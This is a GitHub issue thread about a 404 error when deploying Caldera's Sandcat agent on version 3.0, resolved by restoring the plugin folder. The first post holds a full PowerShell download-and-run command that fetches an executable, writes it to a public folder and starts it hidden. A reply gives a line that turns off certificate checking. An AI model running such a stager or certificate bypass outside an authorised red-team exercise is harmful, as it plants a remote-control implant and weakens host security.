### ISSUE TITLE
Sandcat Agent Deploy - 404 Not Found

### ISSUE THREAD

**Issue by jcleary47** [mitre/caldera#2094]
I recently updated to the latest version of Caldera, and I'm now seeing an issue when trying to install the Sandcat agent on a host:

This was working OK with Caldera 2.9 but I seem to be having this issue on the latest version.

`$server="https://caexvd0458:8443";$url="$server/file/download";$wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows");$wc.Headers.add("file","sandcat.go");$data=$wc.DownloadData($url);$name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","");get-process | ? {$_.modules.filename -like "C:\Users\Public\$name.exe"} | stop-process -f;rm -force "C:\Users\Public\$name.exe" -ea ignore;[io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data) | Out-Null;Start-Process -FilePath C:\Users\Public\$name.exe -ArgumentList "-server $server -group red" -WindowStyle hidden;`

![errorr](https://user-images.githubusercontent.com/73623067/112396330-4f85f080-8cd6-11eb-876f-b540d92f47d3.PNG)

**Comment by garunagiri** [comment]
Hi jcleary47,

Looking at the error message, it looks like PowerShell is able to communicate with the server over HTTPS, but the server isn't able to find the `sandcat.go` executable for Windows.

Do you have the sandcat plugin installed and enabled on the CALDERA server?
Do you have GoLang installed? If not, is there a precompiled `sandcat.go-windows` present in `plugins/sandcat/payloads/`?

**Comment by jcleary47** [comment]
> 
> 
> Hi jcleary47,
> 
> Looking at the error message, it looks like PowerShell is able to communicate with the server over HTTPS, but the server isn't able to find the `sandcat.go` executable for Windows.
> 
> Do you have the sandcat plugin installed and enabled on the CALDERA server?
> Do you have GoLang installed? If not, is there a precompiled `sandcat.go-windows` present in `plugins/sandcat/payloads/`?

Hello garunagiri,

We do have GoLang installed, and it does look like there is a sandcat.go-windows present in plugins/sandcat/payloads/

For what it's worth, if I load up previous version Caldera 2.9, I am able to deploy agent successfully, but when I try on 3.0 I get the 404 error.

Not sure what is different in 3.0 compared to 2.9 that it is no longer working. Not sure if I should try copying the sandcat.go-windows from 2.9 into 3.0 but don't want to break anything.

**Comment by jcleary47** [comment]
> 
> 
> On a fresh install of CALDERA 3.0 I was able to successfully run the deployment command.
> 
> Can you try doing a deployment without SSL, so using the HTTP address instead?
> And if that doesn't work, please try again with a fresh install and let me know if anything's changed.

Looks like the same results still. Does Caldera 3.0 require a different version of Go on the server? The server has 1.13 installed.

**Comment by garunagiri** [comment]
I tested with Go 1.13, and it worked for me.

Your error now seems to be a little different from before. I suspect it may be due to the usage of an unsigned cert.
Try running the following command, and then rerun the deployment command in the same PowerShell session:
`[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}`

**Comment by jcleary47** [comment]
Still the same issue. I think the cert is fine, unless something changed in 3.0

As I mentioned, I can switch over and run 2.9 on the same machine and it deploys an agent OK from 2.9, but when I start up version 3.0 on the same box, I can't deploy an agent. So something must not be compatible or working right that is specific to version 3.0

**Comment by jcleary47** [comment]
I may have fixed it. I noticed during a fresh install of 3.0 that during the git clone process, at the end it gave a warning/error about not being able to recurse into /plugins/sandcat

So I copied the plugins/sandcat from my 2.9 install into my 3.0 install and it worked. Not sure why but it seems like the git clone for 3.0 isn't pulling down all the sandcat plugin data.

**Comment by garunagiri** [comment]
Ah okay. I'm not sure why that might have been an issue, but I'm glad you were able to get it working!
